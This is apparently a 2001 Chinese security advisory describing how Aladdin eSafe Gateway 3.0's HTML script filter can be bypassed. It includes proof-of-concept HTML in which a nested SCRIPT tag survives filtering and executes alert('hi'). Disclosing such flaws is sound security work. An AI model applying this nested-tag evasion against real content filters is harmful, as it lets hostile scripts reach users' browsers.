Aladdin eSafe Gateway 脚本过滤器可被绕过发布时间:2001-05-23 更新时间:2001-05-23 严重程度:高 威胁程度:欺骗 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Aladdin eSafe Gateway 3.0详细描述 Aladdin eSafe Gateway 3.0 是一个INTERNET内容安全产品。你可以配置 Aladdin eSafe Gateway去除进入的HTML文档中的VBScripts, JavaScripts脚本 和其他可执行标签。就是管理员可以限制外部脚本中的命令。不过通过构建特殊 的HTML文件,攻击者可以轻易绕过eSafe的脚本过滤机制。 测试代码 下面是一个有执行命令的脚本: <HTML><HEAD></HEAD> <BODY> <SCRIPT language="JavaScript"> alert("hi"); </SCRIPT> </BODY></HTML> 如果通过esafe过滤引擎运行这个脚本,脚本会清除里面的内容为: <HTML><HEAD></HEAD> <BODY> </BODY></HTML> 不过如果我们建立如下代码: <HTML><HEAD></HEAD> <BODY> <SCRIPT<script language="javascript"> </script> language="javascript"> alert("hi"); </SCRIPT> </BODY></HTML> 过滤后变为: <HTML><HEAD></HEAD> <BODY> <SCRIPT language="javascript"> alert("hi"); </SCRIPT> </BODY></HTML> 而造成脚本命令可继续执行。 解决方案 尚无 相关信息 eDvice Security Services support@edvicetech.com http://www.edvicetech.com |
